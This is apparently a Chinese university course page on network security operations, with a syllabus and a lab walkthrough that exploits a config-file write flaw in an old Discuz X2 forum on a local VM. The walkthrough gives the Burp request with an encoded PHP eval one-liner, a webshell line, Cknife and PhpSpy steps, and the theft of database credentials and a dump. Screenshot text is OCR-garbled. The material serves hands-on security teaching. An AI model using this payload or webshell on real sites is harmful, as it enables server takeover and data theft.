网络安全运行与维护

李成海

目录

  • 1 §1 实训项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)DVWA-master
      • 1.2.2 (2)sqli-labs(第3次课)
      • 1.2.3 (3)sqlmap
      • 1.2.4 (4)login, loginPHP
      • 1.2.5 (5)Firefox, Hackbar
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 Burp(第2次课)
      • 1.3.1 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.3.2 Q&A-2(作业批改、辅导答疑)
    • 1.4 §1.3 Python
      • 1.4.1 Python的Anaconda3集成开发环境
    • 1.5 §1.4 Kali
      • 1.5.1 2022.09.15作业4“永恒之蓝漏洞”
    • 1.6 §1.5 Wireshark
    • 1.7 2022.09.15腾讯会议答疑
  • 2 §2 实训项目2 SQL注入
    • 2.1 ■(1)SQL注入联合查询(第3次课)
      • 2.1.1 附件:联合查询SQL注入模板
      • 2.1.2 ■模板
    • 2.2 (2)SQL注入(PDF文档)
      • 2.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 2.2.2 (2)部署sqli-labs学习环境
      • 2.2.3 (3)sqli-labs使用教学
      • 2.2.4 (4)实战:SQL注入联合查询-获取数据库数据
    • 2.3 ■(3)部署loginPHP网站
      • 2.3.1 ●SQL注入测试
      • 2.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 2.3.3 ①login.php
      • 2.3.4 ②loginAuth.php
      • 2.3.5 ③loginAuth1.php
      • 2.3.6 ④success.php
      • 2.3.7 ⑤failure.php
      • 2.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 2.4 (4)DVWA的SQL Injection
    • 2.5 (5)拓展视野:靶场SQL注入
  • 3 §3 实训项目3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 3.1 (1)安装DVWA
    • 3.2 (2)安装SQLmap
    • 3.3 (3)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 3.4 (4)结果截图(SQLmap拖库)
    • 3.5 (5)使用BurpSuite进行POST方式的SQL注入
    • 3.6 ■附 安装DVWA-1.9(完整版)
  • 4 §4 实训项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 4.1 (1)获取Win7系统shell、开启远程桌面
    • 4.2 (2)截图
    • 4.3 (3)Metasploit渗透测试
    • 4.4 (4)使用msf渗透攻击XP并进行远程关机
  • 5 §5 实训项目5 安装Kali渗透测试系统
    • 5.1 BT到Kali的发展史
    • 5.2 (1)安装Kali
    • 5.3 (2)安装BT5
    • 5.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 6 §6 实训项目6 配置Kali渗透测试系统
    • 6.1 (1)安装Kali渗透测试系统
    • 6.2 (2)SSH连接Kali
    • 6.3 (3)※ettercap抓取FTP登录账号和密码
    • 6.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 7 §7 实训项目7 ARP协议安全攻防
    • 7.1 (1)ARP协议安全攻防(试题)
    • 7.2 (2)※ARP协议安全攻防
    • 7.3 (4)实训 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.4 (3)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.5 演示视频 arpsproof+etthercap实施中间人攻击
  • 8 §8 实训项目8 暴力破解
    • 8.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 8.2 (2)字典工具pydictor.py
    • 8.3 (3)hydra和xhydra
    • 8.4 (4)Medusa
    • 8.5 (5)离线破解md5值和shadow加密文件
    • 8.6 (6)Brute Force(DVWA)
    • 8.7 (7)Burp Suite(Windows)
    • 8.8 (8)Burp Suite(Kali)
  • 9 §9 实训项目9 防止黑客攻破Discuz论坛并拿下数据库
    • 9.1 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 9.2 (2)CentOS6.5-desktop及MySQL
  • 10 §10 实训项目10作业 Wireshark抓取Telnet明文包
    • 10.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 10.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 10.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 11 §11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 11.1 ●文件上传(PDF文档)
    • 11.2 (1)基于文件上传漏洞获得网站shell权限
    • 11.3 (2)本地文件包含漏洞截图
    • 11.4 (3)课程资料
    • 11.5 (4)课外 编辑器KindEditor文件上传漏洞
  • 12 §12 实训项目12 Nmap
    • 12.1 (1)安全工具
    • 12.2 (2)Nmap
    • 12.3 (3)网络空间安全(系统渗透测试篇)
    • 12.4 (4)信息收集
  • 13 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 13.1 (1)本地文件包含
    • 13.2 (2)远程文件包含
  • 14 §14 实训项目14 XSS跨站脚本攻击
    • 14.1 (1)窃取用户Cookie信息保存到远程服务器
    • 14.2 (2)反射型XSS攻击劫持用户浏览器
    • 14.3 (3)存储型XSS窃取用户信息
  • 15 §15 实训项目15 缓冲区溢出漏洞
  • 16 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 17 考核
    • 17.1 平时成绩(40%+30%)
    • 17.2 期末考试(30%)
  • 18 网络1901-04期末考试(2020-2021-2)
    • 18.1 试题1:damicms
    • 18.2 试题2:sqli-labs
    • 18.3 试题3:dvwa
    • 18.4 试题4:loginPHP
  • 19 校外卷重修-B05123网络安全运行与维护复习
    • 19.1 (1)loginPHP
    • 19.2 (2)Python编程
(1)防止黑客攻破Discuz论坛并拿下数据库

实训项目4 (1)防止黑客攻破Discuz论坛并拿下数据库

4.1 快速搭建Discuz论坛

4.2 使用Kali下BurpSuite对Discuz后台注入PHP木马

4.3使用Cknife“菜刀”上传webshell木马到网站

4.4 使用webshell查看MySQL数据库密码并盗取数据库

 

■4.1 快速搭建Discuz论坛

一、攻击思路

想要拿下一台主机A的权限:

1.了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞。

2.拿到对A有一定权限的身份。如果对方是一个Web服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权

3.传上去后,得到Apache用户普通权限,再提权成root

 

二、快速构建实验环境

搭建一个LAMP环境。部署带有漏洞的Discuz论坛。

 

漏洞概述:

这漏洞出现在一个DZX系列自带的转换工具里面。

漏洞路径:utility/convert/data/config.inc.php

漏洞发生的原因是:config.inc.php这个文件在黑客通过post写入时,无任何过滤检测,所以黑客可以通过post方式往config.inc.php中写木马程序。

触发漏洞过程:

(1)在浏览器中访问打开http://192.168.112.100/utility/convert/index.php

(2)使用/utility/convert/index.php进行版本转换时,会自动创建

(3)config.inc.php文件没有做过滤,黑客可以使用post方法对config.inc.php注入木马程序

 

渗透思路:

服务器上搭建一个Discuz论坛,IP:192.168.112.100

(1)修改浏览器使用Burp Suite上网

(2)BurpSuite代理,监听8080端口抓取浏览器上的http请求,抓到请求后,注入PHP一句话木马

(3)使用浏览器访问网站中有漏洞的URL链接

(4)使用Cknife连接到论坛上,然后上传webshell到网站

(5)使用webshell盗取网站的数据库

 

●1.在CentOS7虚拟机上搭建LAMP环境

安装CentOS7

配置网络:IP:192.168.112.100

设置主机名:

# vi/etc/hostname

wgxy

测试:物理机与虚拟机CentOS7能互相ping通,虚拟机能ping通www.baidu.com

▲(1)本地yum源(或网络yum源)

挂载光驱:

# mount /dev/cdrom/media

配置本地yum源:

# mv/etc/yum.repos.d/CentOS-* /opt

# vi /etc/yum.repos.d/centos7.repo

[DVD]

name=CentOS7

baseurl=file:///media

enabled=1

gpgcheck=0

# ls/etc/yum.repos.d/centos7.repo

# cat !$

cat/etc/yum.repos.d/centos7.repo

# yum clean all

# yum makecache;yumrepolist all

# yum list

 

▲(2)安装Apache、MySQL、PHP

[root@wgxy ~]# yum -yinstall httpd mariadb-server mariadb php php-mysql

                                                  Apache MySQL Server MySQL  PHPPHP连接数据库

参数:mariadb-server这是MySQL数据库的一个分支

 

▲(3)启动Apache、MySQL服务

[root@wgxy ~]#systemctl start httpd

[root@wgxy ~]#systemctl start mariadb

设置MySQL数据库root用户的密码:

[root@wgxy ~]#mysqladmin -u root password "123456"

[root@wgxy ~]# mysql -uroot -p123456

MariaDB[(none)]>exit

[root@wgxy ~]#

 

●2.上传Discuz_X2_SC_UTF8.zip到Linux系统/root下

Xshell远程SSH连接CentOS7

[root@wgxy ~]# rz

上传Discuz_X2_SC_UTF8.zip到/root目录

[root@wgxy ~]# ls

[root@wgxy ~]# unzipDiscuz_X2_SC_UTF8.zip

[root@wgxy ~]# ls

  upload utility等目录

[root@wgxy ~]# mvupload/* /var/www/html/

[root@wgxy ~]# mvutility/ /var/www/html/

[root@wgxy ~]# cd/var/www/html/

[root@wgxy ~]# ls

  admin.php connectp.asp utility等

[root@wgxy html]# chown-R apache:apache uc_server/ uc_client/ data/ config/

[root@wgxy html]# chown-R apache:apache utility/convert/data

[root@wgxy html]# ps-axu | grep apache

[root@wgxy html]#iptables -F

 

●3.浏览器输入http://192.168.112.100安装配置Discuz论坛

物理机浏览器Firefox:http://192.168.112.100

Discuz. 戔 乍 」 荨 @login @loginPHP Discuz! @ 192 . 16 & 112 . 100 / inst 7 0 DVWA-master @pleasesignin @localhostaccessonly!! 安 装 向 导 : 移 动 设 上 的 韦 筌 Disc 凵 艺 X2 简 中 文 凵 TF8 2011052g 中 文 版 擾 权 协 议 适 用 于 中 文 用 户 版 枚 有 囵 2001 一 201L 北 原 康 盛 新 创 科 技 帳 庄 公 司 保 所 有 权 利 . 选 择 康 盛 品 . 希 我 们 的 努 力 能 为 您 扌 供 一 一 个 高 效 快 速 . 强 大 勹 站 点 尖 方 , 衤 的 大 勹 社 区 论 坛 鹾 尖 方 康 盛 公 司 网 址 为 http //www.com/en乙com, 产 品 官 方 讨 论 区 网 址 为 http //www.discu乙 net. 用 户 须 : 本 协 议 您 与 康 盛 公 司 之 河 关 于 您 非 商 业 傅 凭 康 盛 公 司 僻 启 勹 各 种 軟 偉 产 品 及 的 法 哇 身 议 . 无 论 您 杲 个 人 或 坦 纟 盈 利 与 否 · 如 何 〔 包 括 以 享 习 和 研 力 目 的 〕 . 均 仔 兑 读 本 协 《 如 包 括 兔 涂 者 制 康 盛 蚕 任 的 免 萋 景 款 及 《 您 权 利 限 制 . 适 您 0 刿 卉 亚 不 蓥 本 服 景 款 。 如 不 同 意 本 服 景 款 盛 时 对 具 的 修 改 , 您 应 不 便 甲 或 主 动 取 消 康 盛 公 司 僻 启 勹 康 盛 品 . 否 贝 您 倉 引 彐 丬 对 康 盛 品 中 的 榴 英 的 氵 主 册 . 登 . 下 载 . 苷 等 傅 凭 行 为 将 被 视 为 您 对 本 服 景 釒 部 完 全 , 包 括 受 盛 对 服 景 款 时 所 做 倉 引 彐 丬 修 改 。 本 服 敦 一 旦 兰 壹 更 , 康 盛 在 网 页 上 公 布 修 改 内 容 。 修 舌 的 服 敦 一 旦 在 网 页 上 公 布 即 有 效 代 替 原 只 的 服 敦 。 您 可 时 登 迂 康 盛 直 方 论 坛 笪 兑 新 版 报 敦 。 如 是 扌 妾 壹 本 辶 即 过 亍 您 同 意 接 壹 协 议 各 项 # 的 约 束 。 如 果 您 不 同 意 本 服 景 款 , 贝 刂 不 得 飞 蘢 甲 本 服 的 权 利 . 您 若 有 本 景 款 规 定 , 康 盛 公 司 有 权 时 中 止 或 终 止 您 对 康 盛 品 的 傅 凭 资 相 卉 保 究 1 巨 关 法 噩 任 的 权 利 . 我 同 意 我 不 同 意 2 日 日 1 . 2 日 11 Comsenz I n 0

 

Discuz! login @ loginPHP Discuzl. PHP (D 192.168.112.100 /install/index.p' @Please sign in @localhost access only!! DVWA-master Discuz! IOM Discuz! *Unix Discuz!X2 UTF8 20110629 Linux •e• 2M bundled (2.1.0 compatible) .e• 4321M ./config/config_global.php ./config/config_ucenter.php ./config

 

数据库密码:123456

管理员密码:123456

重复密码:  123456

Discuz! login @ loginPHP Discuzl. (D 192.168.112.100 /install/index.p' @Please sign in @localhost access only!! DVWA-master Discuz!X2 UTF8 20110629 3. Email: Email: loca lhost ultrax root 123456 admin admin@admin.com

 

论 坛 -PoweredbyDiscuz! @ 192 . 168 . 11 艺 100 / forum . php @login @loginPHP @DVWA-master @pleasesignin @localhostaccessonly!! 设 为 首 页 收 本 站 0 社 区 动 力 DISCUZ ! 用 户 名 密 码 囗 自 动 登 录 登 录 : 移 动 设 上 的 韦 筌 忉 换 到 贲 找 回 密 码 豆 即 注 册 门 户 论 坛 谲 输 入 扌 叟 索 内 容 群 组 家 园 排 行 榜 搜 索 i 仑 坛 今 已 的 昨 已 的 巾 占 子 : 0 Discuz! 0 默 认 版 块 在 线 会 员 以 苣 理 员 1 人 在 线 一 0 会 员 ( 0 隐 身 〗 1 位 游 客 一 最 记 录 是 1 于 川 21 一 5 一 7 . 扈 超 芏 扈 当 前 只 有 游 客 或 身 会 员 存 线 官 方 论 坛 提 最 新 就 烈 产 品 新 闻 、 软 件 下 载 与 技 术 交 流 游 屮 台 我 的 她 Powered by Discuz! × 2 @ 20 〕 卜 20H 扈 n 记 《 n 匚 。 快 摔 肮 垫 : 店 动 交 友 c 查 香 新 鮎 Archrver Comsenzlnc G T 十 8 , 202 卜 5 . 7 : 巧 , p 「 匚 ℃ 扈 扈 貊 00 〕 彐 783 扈 匚 Ond 卜 ),4qu 扈 「 三

 

用户名:admin,密码:123456,登录

计算机生成了可选文字:论坛_PoweredbyDiscuz!@192.168.11艺100/fon」m.php0loginloginPHPDVWA-master0pleasesignin0c引卜ostaccessonly!!消《提雏设为首页收本站0社区动力DISCUZ!£admin存线门户苣理分门户群组家园排行榜:移动上的韦忉换到贲苣理中心《退出用户组.苣理员快摔肮论坛谲输入扌叟索内容搜索垫:店动交友ci仑坛今:昨:的巾占子:0Discuz!0默认版块在线会员1人在线一1会员(0隐身0游客一最记录是1于川21一5一7.我的鮎子查香新鮎以苣理员扈超芏官方论坛扈提最新D品新闻、软件下载与技术交流游屮台我的她Poweredby×2@20〕卜20H扈n记《站点计举掘ArchrverGT十8,202卜5.7:,p「0℃tE040ComsenzInc.

 

 

■4.2 使用Kali下Burp Suite对Discuz后台注入PHP木马

一、浏览器上开启代理模式进行抓包

以下操作在Kali Linux上进行操作

浏览器打开设置页面,Preferences,General,Settings...

我们把设置页面拉到最下面找到NetworkProxy

配置我们的代理设置

Manualproxy configuration  HTTP Proxy  127.0.0.1 8080 Use this proxy server for all protocols

 

二、在Kali上使用burpsuite进行抓包

打开burpsuite。 brup打嗝,suite 套件

打开会有提示我们的jre我们点击OK即可

注:此窗口弹出的含意如下:

Burp Suite社区版

您的JRE似乎是来自Oracle公司的ll.0.3版本

Burp还没有在这个平台上进行全面测试,您可能会遇到问题。

experience 经历

我们先关闭拦截,点一下“interceptis on”,变为“intercept is off”,因为我们要先访问我们的论坛。

点完后变为:intercept is off

intercept 拦截 截听

浏览器进行操作抓包

在Kali上,打开注入漏洞的地方http://192.168.112.100/utility/convert

然后我们回到burpsuite开启拦截

我们再回到Web界面点击任意版本的开始按钮

• Discuz! X @ login @ loginPHP @ DVWA-master 192.168.112.100 /utility/convert/ @Please sign in @localhost access only!! IJCenter Home 2.0 supeste 7.5 IJCenter Home 2.0 Discuz! 7.2 Discuz! 7.2 IJCenter Home 2.0 supeste 7.5 supeste 7.5 Discuz! 7.2 x2.O Discuz! Xl.o Discuz! Xl Discuz! X2.o Discuz! Xl Discuz! Xl.5 Discuz! Xl.5 Discuz! Xl.5 Discuz! X2.o Discuz! X2.o ucenter Home 2.0 Xl, SupeSte 7.5 Discuz! Xl, ucenter Home 2.0 Discuz! X2.o, Discuz! X2.o æJ1.6.0E3, 12.0 7.2 Discuz! Xl Discuz! 7.2 Discuz! Xl.5. Discuz! Xl.5 ucenter Home 2.0 Xl.5, Xl.5 SupeSte 7.5 Discuz! Xl.5, Discuz! Xl .5 SupeSte 7.5 Discuz! X2.O, Disc 12.0 12.0 Discuz! 7.2 Discuz! X2.0, LICenter LICenter1.6.O , Disc X2.o Comænz Inc . 2001-2010 . net

回到burpsuite查看截取到浏览器数据包:如果之前抓取到了别的数据包,需要先点击forward按钮,把之前的http请求都放行了。然后再访问我们需要访问的链接。

Burp Suite Professional vI.7.37 Burp Intruder Repeater Window Help - Temporary Project - licensed to surferxyz Target Spider Scanner Intruder Repeater Options Seq uencer Decoder Comparer Extender Project options User options tercept H TTP history WebSockets history Request to http//19218811210080 Intercept is on w Params Headers Hex GET 2_x20 Host User-Agent: MozillaE0 cvundovvs NT 10 0, VMn64; x64; rv 880) Geckor20100101 FirefoxE80 Accept: text'html ,application/xhtml+xml S ,image/webp 8 Accept-Language: zh-CN 7 ,zh-HK, S ,en-US, 3 Accept-Encoding: gzip, deflate Connection: close Referer: http:.'/1 92M 68M 1 21 00/utiIty/conveN/ Comment this item cookie: phpspypass=wgxy, NIwo_21 620378925, NIwo_21 620382613%oghome php%ogspacecp; NIwo_2132 ZCPLrxm70AMM23D6%2Fozlo Upgrade-Insecure-Requests I Type a search term Alerts O matches

右键点击空白处,选择Send to repeater。

然后在Repeater查看信息:

Burp Suite Professional vI.7.37 Burp Intruder Repeater Window Help Target Proxy Spider Scanner Request Params Headers Hex - Temporary Project - licensed to surferxyz Intruder Repeater Seq uencer Decoder Comparer Extender Project options User options Alerts Target: http://192.168.112.100 Response GET 2_x2 0 Host User-Agent: MozillaE0 cvundows NT 10 0, VMn64; x64; rv 880) Geckor20100101 FirefoxE80 Accept: text'html ,application/xhtml+xml S ,image/webp 8 Accept-Language: zh-CN 7 ,zh-HK, S ,en-US, 3 Accept-Encoding: gzip, deflate Connection: close Referer: http:.'/1 92 M 68M 1 21 00/utiIty/conveN/ cookie: phpspypass=wgxy, NIwo_21 620378925, NIwo_21 620382613%09home php%ogspacecp, NIwo_2132 5787JojSL3Yp, ZCPLrxm70AMM23D6%2Fozlo Upgrade-Insecure-Requests I Type a search term O matches O matches

修改第一行:

GET/utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

为:注意POST后面没有回车,这里是文本显示自动换行了。

POST/utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yesHTTP/1.1

注:这是一个php一句话木马加密后的内容。翻译后的内容为:

POST/utility/convert/index.php?a=config& source=d7.2_x2.0 &newconfig[aaa%0a%0d

eval("$_POST[c];"); c];");//]=aaaa&submit=yes

再转换%0a%0d代表回车换行

POST/utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa

eval("$_POST[c];"););

 

扩展1eval()函数

eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行,

一般情况下不建议使用容易被黑客利用。evaluate 评价

eval("echo'helloworld';"); 等同于下边的代码:

echo"helloworld"; 在浏览器中都输出:hello world

 

修改完成后发送数据包

计算机生成了可选文字:到,8凵rSuiteProfessionalvL737-TemporaryProject-licensedtosurferxyzBurpIntruderRepeaterWindowHelpSpiderScannerInt「OderDecoderComparerExtenderProjectopt'onsResponse」S訂opt'ons焱耐STarget:http引19z16&11z1[甩RequestPOSTHeadersHexHeadersHTTP/I国2000HexHTMLRenderMilty/convelffndexphpQa=config8source=d72X208newconflg[aaa%Oa%Odeval(CHR(101〕CHR()1CHR〔97〕CHR(I〕CHR〔40〕CHR〔34〕CHR〔36〕CHR〔95〕CHR()0〕CHR〔79〕CHR()3〕CHR(84)CHR()1〕CHR(99〕CHR(93)CHR()9〕CHR(34)CHR()1〕CHR(S9)),m=aaaa8submt=yesHTT生1Host19216&112100User-AgentMO记引剞50CWndOWSNT100,飞n64,x64,rV880〕Gec00100101Firef0XE80Accept怩对小tm《,application/xhtml+xml,application/xml;q=09,imageANebpq=08Accept-LanguageZh-CN,zh,q=08,zh-W,q=07h.H民q=0S,en-lJS,q=03,en,q=02Accept-encodinggzip,deflateRefererhttp9216811210y化onveC00知ephpspypass=wgxy,NIwO2132St训S=1620378925,NIWO2132Sld=iSkXSK,NIWO2132lastact=1620382引3%php%Ogspacecp,NIWO2132auth=5404cfWKrTAcP7VdAKiOEFQqJ71vsemtvgztWLCXXblKnopEljmU4hqoROhd9inRVX2upjHm577JSL3Yp,NIWO2132ulaStaCtiVty=28fclGJyrVRDW4FmtkAyl%2Fat4SzCqT%2FZCPLrxm70AMM23D6%2FOzloUpgrade-Insecure-Requests1DateFri,07May2021104845GMServerApache,Q46(Centos〕OpenSSL/102psPHPE416X-powered-ayPHPE4国6Content-Typetext,htmlContent-Length9486<的0CTYPEmPUBLIC庸3C70丆0XHTML,0丆月S地月aEvp#MV30r0了戈m/l/O丆0仅m的一,ra月S地月a£0№w><htmlxmlns="http//WWWW3or1999htm《"<head>4tle>Discuz!×系列产品升级转涣<黼启>metahttp-equiv="Content-Typecontent='textfiml;Charset=utf-8"<Styletype='text/css>body,td{font-family:Tahoma;font-size:12p;line-height:150‰;}form{margin:Op;padding:Opx;}a:link,a:visited,a:active{C引0仁#333333;textdecoration:none;}a:hover{C引0仁*FOOOO•text-decoration:underline;}.header{background-color:f;font-weight:bold;text-align:center}.input,textarea{font-family:Tahoma•font-size:12p,C引0仁#333333;bacground.C引0仁—'border:Ip瓦solid*66666;padding-left:2px;}丆》Sasearchterm0matchestop{background-color:.bgl{background-color:8}.bg2{background-color:*efemmenu{background-color:5f5f5;}.tableborder{background-color:#e5e5}e{background:#5086A5;font-weight:b引d;C引0仁*FFFFF;}丆》Sasearchterm0matches90bytes》7millis

 

查看执行结果:

登录wgxy上,查看刚通过该漏洞注入的文件

[root@wgxy html]# cat/var/www/html/utility/convert/data/config.inc.php

注:/var/www/html/utility/convert/data/config.inc.php这个文件原来的网站上没有的

1 CentOS7.8(192.168.112.100) x ?phpAM $_config = array() ; AM CONFIG AAA .CHR(118) CHR(93) $_config CentOS7.8(1g2.168.112.100) - root@lgglch:- - Xshell 5 41 CHR(97) . CHR(83) CHR(84) CHR(36) . CHR Meval 101) . 118) . CHR(97) . 138) . . CHR(34) . CHR(36) . CHR(95) . . CHR(79) . CHR(83) . CHR(84) . CHR(91) . CHR(99) . CHR(40) CHR(34) ) .CHR(80) CHR(79) . CHR ) . CHR . CHR(41) . CHR(59)) . CHR(93) . CHR(59) . CHR(34) . CHR(41) . CHR(59) ) , CONFIG SOURCE aaaa $_config $_config $_config $_config $_config $_config $_config $_config $_config $_config sou rce sou rce sou rce sou rce sou rce sou rce sou rce target target target dbhost'] dbuser'] dbpw ] dbname ] ] [ 'tablepre'] dbcharset ] localhost root discuz pconnect ' ] CONFIG TARGET dbhost'] dbuser'] dbpw ] localhost root 1,1

可以看到和我们修改提交的参数类似。而且多了很多^M符号。

 

扩展2:^M符号

^M字符的来历和作用:在DOS/Windows里,文本文件的换行符为\r\n,而在Linux系统里则为\n,所以DOS/Windows里编辑过的文本文件到了Linux里,每一行都多了个^M。所以^M只是一个换行符号,没有实际的用处,我们可以将它保留,也可以将它删除。

%0a%0d等于\r\n

 

扩展3webshell简介

webshell从名字上来看就是在web站点上的一个shell管理工具,其实就是这样,webshell文件上传到站点后,黑客进行访问该文件并提交代码进行执行,从而入侵web站点。所以它也是木马的一种,在web领域这类木马分为两类,大马和小马。

小马通常指一句话木马,可以用来渗透测试初期与服务器建立链接取得shell权限;大马就是在小马的基础上集成了非常多的功能,比如连接数据库下载文件等。

我们刚才上传的文件就是一个webshell是使用php语言进行编写的,当然webshell也有其他语言如jsp等。

webshell的工作原理

查看源码

[root@wgxy uploads]#vim webshell.php

<?php @eval($_POST[wgxy]);?>

中间标红的就是一句话木马的代码格式。

eval()函数把字符串按照PHP代码来计算。字符串可以通过$_POST获取代码。wgxy为密码。

 

 

■4.3 使用Cknife“菜刀”上传Webshell木马到网站

一、在wgxy上配置java环境

搭建java环境

[root@wgxy ~]# yuminstall -y java

然后查看java版本

[root@wgxy ~]# java-version

openjdk version"1.8.0_262"

OpenJDK RuntimeEnvironment (build 1.8.0_262-b10)

OpenJDK 64-BitServer VM (build 25.262-b10, mixed mode)

我们在CentOS上面使用rz命令上传java版本的菜刀和我们后面需要的webshell2.php

[root@wgxy ~]# rz

按住Ctrl+鼠标左键可以多选,我们选择Cknife.jar和webshell2.php

安装完成java以后我们再来启动菜刀程序,需要在图形界面执行此命令

[root@wgxy ~]# java-jar Cknife.jar

排错:如果打开程序后,看到是乱码的,我们更换一下皮肤即可解决乱码问题

 

也可以安装蚁剑专业Web渗透工具:

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任!

中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!

一剑在手,纵横无忧!

蚁剑:

①蚁剑-AntSword-Loader-v4.0.3-win32-x64.zip(59MB)

②antSword-master.zip(15MB)

分别解压到AntSword-Loader-v4.0.3-win32-x64、antSword-master文件夹

运行蚁剑加载器AntSword-Loader-v4.0.3-win32-x64\AntSword.exe

0 中 蚁 刽 〔 器 Help 文 档 GitHub 请 选 择 螟 剑 工 作 目 录 ! 初 始 化

点击「初始化」按钮,选择已经解压的源代码所在文件夹antSword-master

Desktop a ntSword -master ster" O Desktop SYS SOFT github mod u les node modules sou rce static antSword -ma ster 2021/5/7 16:20 2021/5/7 16:20 2021/5/7 16:20 2021/5/7 16:20 2021/5/7 16:20 2021/5/7 16:20

待提示设置完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面:

0 中 国 蚁 刽 AntSword 編 0 设 舌 掘 管 理 ( 0 ) RI-ffåll 到 二 0 分 类 目 录 ( 1 ) 物 理 位 舌 网 站 备 窪 创 津 时 闾 更 新 时 闾 0 0 默 认 分 类 A 重 命 名 0

 

二、使用菜刀连接Discuz论坛上面的php后门程序

右键点击添加数据

路径:http://192.168.112.100/utility/convert/data/config.inc.php

密码:c

Ip Time WNSHELL '182.16B.112.100/utility/convert/data/config.inc.php pHp (Eval) 231

双击点开我们添加的地址

1巳2.16巳.112.1口口 http://1S2.1æ.112.100/utility/convert/data/config.inc•php 完咸』 X Cknife 1.0 R巳l巳쳕s巳 Time 132.16巳.112.1口口 2口21-口5-口7 1또.

已经可以进入网站目录

/var/www/html/utility/convert/data/l convert config. default.php config. inc.php 2011-06-28 04 2021-05-07 10 835 0644 1481 0644

 

三、上传功能更强大的木马文件webshell2.php

注:这里需要上传到apache用户有写权限的目录中,因为安装过程中Discuz需要管理员修改部分

权限为apache用户,所以必然有可以上传文件的目录,我们可以直接上传到data目录下。

182.168.112.100 /var/www/html/utility/convert/data/ convert _Ef%VJ config. default. php config. inc.php ebshe112.php 2021-05-07 2011-06-28 04 2021-05-07 11 10 835 0644 1481 0644 a... 0644

 

四、任意机器访问我们的webshell2.php木马文件

浏览器输入http://192.168.112.100/utility/convert/data/webshell2.php  输入密码:wgxy

成功进入webshell

Discuz! X PhpSpy (D 192.168.112.100 /utility/convert/data/webshe112.php . login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect File Manager - current diSk tree 4.2 G at 9.72 G (43.21%) Current Directory (Writable, 0755) "Vartwww/html/utility/convert/data/ WebRoot View writable Create File enzszy 2008 Safe Mode:No Upload Filename Parent Directo config defaultzng configjncn_ng webshe112 Packing download selected - Delete s elected Last modified 2011-06-29 04:35 38 2021-05-07 2021-05-07 145K 66 98 K Chmod / Perms 0644 / _rvV_r 0644/ rw_r 0644 / _rvV_r Copyright (C) 2004-2008 Team All Rights Reserved Down Cozy Rename Time Down Cozy Rename Time Down Cozy Rename Time O directories 13 files Processed in 0000570 second(s)

 

 

■4.4 使用Webshell查看MySQL数据库密码并盗取数据库

一、分析配置文件获取数据库密码

获取mysql密码:

进到/var/www/html/config/config_global.php,获取到root用户和密码:

用户名:root

密码:123456

数据库:ultrax

Discuz! X PhpSpy (D 192.168.112.100 /utility/convert/data/webshe' login 192.168.112.100(192.168.112.100) ; I ['dbhcst'l C' cibname'l @ loginPHP @ DVWA-master @Please sign in @localhost access only!! enzszy 2008 Egggu_t File Manage! mySQL Manage! mySQL Uoload& Download Execute Command PHP Variable Eval PHP Code Back Connect Safe Mode:No create 1 Edit File Current File (impon new file name and new file) Nartwww/html/config/config_globalßhp File Content < 2 php conf array ; C ' dbuser'l CONFIG DB = ' I coal host'; ' root'; '123456'; = 'utfS' — 'ultrax' CONFIG UEYCRY ; config['memcry'l [ 'prefix' I = 'nLGEbY ' ; ; config['mercry'l ['eacceLeratcr'l

 

二、导出数据库文件

连接数据库:

MySQLManager

DBPass:123456

Connect

选择数据库:ultrax

显示表:

选中自己想下载的软件包,导出数据库

保存好这个地址:/var/www/html/utility/convert/data/192.168.112.100_MySQL.sql

